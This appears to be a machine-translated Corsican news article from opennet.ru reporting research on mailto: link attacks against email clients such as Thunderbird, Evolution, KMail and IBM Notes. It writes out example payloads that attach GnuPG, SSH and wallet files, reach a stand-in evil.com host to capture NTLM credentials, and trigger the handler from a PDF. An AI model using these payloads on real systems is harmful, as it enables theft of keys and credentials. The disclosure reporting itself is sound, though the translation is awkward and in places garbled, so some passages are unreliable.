Attaccà l'utilizatori di i clienti di e-mail utilizendu ligami "mailto:".

Ricercatori di l'Università Ruhr di Bochum (Germania) analizatu (PDF) cumportamentu di i clienti di mail quandu u processu "mailto:" ligami cù paràmetri avanzati. Cinque di i vinti clienti di e-mail esaminati eranu vulnerabili à un attaccu chì manipulava a sustituzione di risorse utilizendu u paràmetru "attach". Un altru sei clienti di e-mail eranu vulnerabili à un attaccu di sustituzione di chjave PGP è S/MIME, è trè clienti eranu vulnerabili à un attaccu per estrae u cuntenutu di i missaghji criptati.

ligami «Mailto:"Sò aduprati per automatizà l'apertura di un cliente di email per scrive una lettera à u destinatariu specificatu in u ligame. In più di l'indirizzu, pudete specificà parametri supplementari cum'è parte di u ligame, cum'è u sughjettu di a lettera è un mudellu per u cuntenutu tipicu. L'attaccu prupostu manipula u paràmetru "attach", chì permette di aghjunghje un attache à u messagiu generatu.

I clienti di mail Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) è Pegasus Mail eranu vulnerabili à un attaccu triviale chì vi permette di attaccà automaticamente. ogni schedariu locale, specificatu via un ligame cum'è "mailto:?attach=path_to_file". U schedariu hè attaccatu senza vede un avvisu, cusì senza una attenzione particulari, l'utilizatore ùn pò micca avvistà chì a lettera serà mandata cù un attache.

Per esempiu, usendu un ligame cum'è "mailto:[email prutettu]&subject=Titulu&body=Text&attach=~/.gnupg/secring.gpg" pudete inserisce e chjave private da GnuPG in a lettera. Tù dinù ponu mandà u cuntenutu di crypto wallets (~/.bitcoin/wallet.dat), chiavi SSH (~/.ssh/id_rsa) è ogni schedariu accessìbule à l 'utilizatori. Inoltre, Thunderbird permette di aghjunghje gruppi di fugliali per maschera cù custruzzioni cum'è "attach=/tmp/*.txt".

In più di i fugliali lucali, certi clienti di e-mail processanu ligami à u almacenamentu di a rete è i percorsi in u servitore IMAP. In particulare, IBM Notes permette di trasfiriri un schedariu da un repertoriu di a rete quandu si tratta di ligami cum'è "attach=\\evil.com\dummyfile", è ancu intercepte i paràmetri di autentificazione NTLM mandendu un ligame à un servitore SMB cuntrullatu da l'attaccante. (a dumanda serà mandata cù i paràmetri di autentificazione attuale di l'utilizatore).

Thunderbird processa bè e dumande cum'è "attach=imap:///fetch>UID>/INBOX>1/", chì vi permettenu di aghjunghje u cuntenutu da i cartulare nantu à u servitore IMAP. À u listessu tempu, i missaghji recuperati da IMAP, criptati via OpenPGP è S/MIME, sò automaticamente decriptati da u cliente di mail prima di mandà. I sviluppatori di Thunderbird eranu notificatu circa u prublema in u ferraghju è in u prublema Thunderbird 78 U prublema hè digià riparatu (i rami Thunderbird 52, 60 è 68 restanu vulnerabili).

E versioni antichi di Thunderbird eranu ancu vulnerabili à duie altre varianti d'attaccu nantu à PGP è S/MIME pruposti da i circadori. In particulare, Thunderbird, cum'è OutLook, PostBox, eM Client, MailMate è R2Mail2, hè statu sottumessu à un attaccu di sustituzione chjave, causatu da u fattu chì u cliente di mail importa automaticamente è installate novi certificati trasmessi in missaghji S/MIME, chì permette l'attaccante per urganizà a sustituzione di chjavi pubblichi digià almacenati da l'utilizatore.

U secondu attaccu, à quale Thunderbird, PostBox è MailMate sò suscettibili, manipule e caratteristiche di u mecanismu per l'autosalvazione di messagi di scrittura è permette, utilizendu paràmetri di mailto, per inizià a decifrazione di missaghji criptati o l'aghjunzione di una firma digitale per i missaghji arbitrarii, cù trasmissioni successiva di u risultatu à u servitore IMAP di l'attaccante. In questu attaccu, u ciphertext hè trasmessu attraversu u paràmetru "corpu", è a tag "meta refresh" hè utilizata per inizià una chjamata à u servitore IMAP di l'attaccante. Per esempiu: ' '

Per processà automaticamente i ligami "mailto:" senza interazzione di l'utilizatori, ponu esse utilizati documenti PDF apposta - l'azzione OpenAction in PDF permette di lancià automaticamente u gestore di mailto quandu apre un documentu:

%PDF-1.5
1 0 obj
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj

2 0 obj
<< /Type /Action /S /URI/URI (mailto:?body=——BEGIN PGP MESSAGE——[…])>>
endobj

Attaccà l'utilizatori di i clienti di e-mail utilizendu ligami "mailto:".

Source: opennet.ru

Add a comment